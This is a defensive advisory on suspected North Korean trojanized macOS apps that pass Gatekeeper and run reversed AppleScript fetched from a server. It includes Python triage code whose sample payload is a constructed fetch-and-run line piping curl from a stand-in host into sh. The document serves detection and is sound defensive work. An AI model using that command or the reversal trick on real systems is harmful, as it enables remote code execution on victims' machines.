Introduction
Recent reports indicate that suspected North Korean threat actors are targeting Apple macOS systems with trojanized applications that are signed and notarized under a legitimate Apple Developer ID, so they pass Gatekeeper and run without warnings. The lures are cryptocurrency-themed, pointing to financial theft as the objective.
Description
Suspected North Korean threat actors are targeting Apple macOS systems with a trojanized notepad application and a trojanized open-source Minesweeper game, both built with Flutter, Google's cross-platform software development kit [1][3]. The applications were signed and notarized under a legitimate Apple Developer ID, so Gatekeeper treated them as verified software and allowed them to launch without restriction [3]. The bypass was temporary: notarization and Developer ID signing are revocable trust decisions, not a permanent exemption from macOS controls [3].
The embedded malware contacts an attacker-controlled domain, downloads AppleScript, and executes it, giving the operator remote control of the victim's machine [2]. Because the server decides what script is delivered, the same implant can be used to capture data or to stage further malware without changing the signed application itself [2].
The Flutter build gives the apps an unusual layout that hinders casual inspection: the main application logic is written in Dart and compiled into a dynamic library (dylib) that the Flutter engine loads at runtime, so the Mach-O main executable a reviewer would normally examine contains little of interest [1]. The cryptocurrency themes of the lures indicate that financial theft is the goal [3]. The AppleScript delivered by the server is written backwards, which defeats naive string matching on the payload while costing the attacker only a reversal before execution.
Jamf Threat Labs assesses that the campaign looks more like an experiment in circumventing macOS security than a highly targeted operation [3], and the researchers believe the malware is still in a testing phase [1].
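As an added triage example for the two behaviours described above (server-delivered AppleScript executed via osascript, and the script being written backwards), the following Python code is written for this page and is not Jamf Threat Labs tooling or code recovered from the campaign. The telemetry field names (`parent`, `child`, `parent_signer`) and every sample script and event are constructed assumptions; adapt them to whatever your EDR actually emits.

```python
"""Added triage example for the behaviours described above.

This is illustrative code written for this page; it is not Jamf Threat
Labs tooling and not code recovered from the campaign. The telemetry
field names and all sample data below are constructed assumptions.
"""
import os

# AppleScript constructs a server-delivered control script would plausibly
# contain. Generic reference points, not signatures taken from the reports.
APPLESCRIPT_MARKERS = (
    "do shell script",
    "tell application",
    "end tell",
    "on run",
    "set ",
    "osascript",
)


def applescript_score(text: str) -> int:
    """Count how many distinct AppleScript markers appear in text (case-insensitive)."""
    lowered = text.lower()
    return sum(1 for marker in APPLESCRIPT_MARKERS if marker in lowered)


def recover_script(payload: str) -> tuple[str, str]:
    """Return (orientation, readable_script) for a payload that may be reversed.

    A script written backwards scores near zero as delivered, because keyword
    matching runs left to right, but scores normally once the characters are
    reversed. Scoring both orientations defeats the trick without guessing.
    """
    reversed_payload = payload[::-1]
    if applescript_score(reversed_payload) > applescript_score(payload):
        return "reversed", reversed_payload
    return "forward", payload


def flag_osascript_from_third_party_apps(events: list[dict]) -> list[str]:
    """Return parent binaries of osascript launches by non-Apple app bundles.

    Assumed event fields: 'parent' (launching binary path), 'child' (launched
    binary path), 'parent_signer' ('apple', 'developer_id' or 'unsigned').
    Apple's own apps (Script Editor, Automator) spawn osascript legitimately
    and are excluded; a Developer ID-signed notepad or game has no ordinary
    reason to.
    """
    hits = []
    for event in events:
        if os.path.basename(event["child"]) != "osascript":
            continue
        if ".app/Contents/MacOS/" not in event["parent"]:
            continue
        if event.get("parent_signer") == "apple":
            continue
        hits.append(event["parent"])
    return hits


# Constructed sample: a control script as it would read to an analyst, and the
# same script reversed as it would arrive from the server.
FORWARD_SCRIPT = (
    'do shell script "curl -s https://example.invalid/stage2 | sh"\n'
    'tell application "System Events" to keystroke "a"\n'
)
REVERSED_SCRIPT = FORWARD_SCRIPT[::-1]

# Constructed process-start events (assumed schema; adapt to your sensor).
SAMPLE_EVENTS = [
    {"parent": "/Applications/Notepad.app/Contents/MacOS/Notepad",
     "child": "/usr/bin/osascript", "parent_signer": "developer_id"},
    {"parent": "/System/Applications/Utilities/Script Editor.app/Contents/MacOS/Script Editor",
     "child": "/usr/bin/osascript", "parent_signer": "apple"},
    {"parent": "/Applications/Notepad.app/Contents/MacOS/Notepad",
     "child": "/usr/bin/curl", "parent_signer": "developer_id"},
]

if __name__ == "__main__":
    orientation, script = recover_script(REVERSED_SCRIPT)
    print(f"payload orientation: {orientation}")
    print(script)
    for parent in flag_osascript_from_third_party_apps(SAMPLE_EVENTS):
        print(f"osascript launched by third-party app: {parent}")
```

Two caveats for anyone adapting this. The orientation check only handles character-level reversal; a payload that is also base64-encoded or XOR-obfuscated needs its own normaliser before scoring. And the process rule is a triage signal, not a verdict: some legitimate Developer ID-signed installers and automation tools do call osascript, so pair the hit with the network destination and the code-signing identity before escalating.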
Conclusion
The campaign exploits no software vulnerability in macOS; it abuses the trust that Gatekeeper places in a valid Developer ID signature plus notarization, which is why the apps ran unchallenged until that trust was withdrawn. Notarization should therefore be treated as necessary but not sufficient: defenders should watch for third-party applications spawning osascript, for newly installed apps making outbound connections to unfamiliar domains, and for script payloads that only become readable once reversed or otherwise normalised. Because the malware appears to still be in a testing phase, the tooling and tradecraft seen here are likely to be refined, so security teams should expect follow-on variants rather than treat the reported samples as the final form.
References
[1] https://thecyberwire.com/newsletters/daily-briefing/13/214
[2] https://appleinsider.com/articles/24/11/12/north-korean-hackers-use-infected-crypto-apps-to-target-mac-devices
[3] https://www.isss.org.uk/news/north-korean-hackers-create-flutter-apps-to-bypass-macos-security/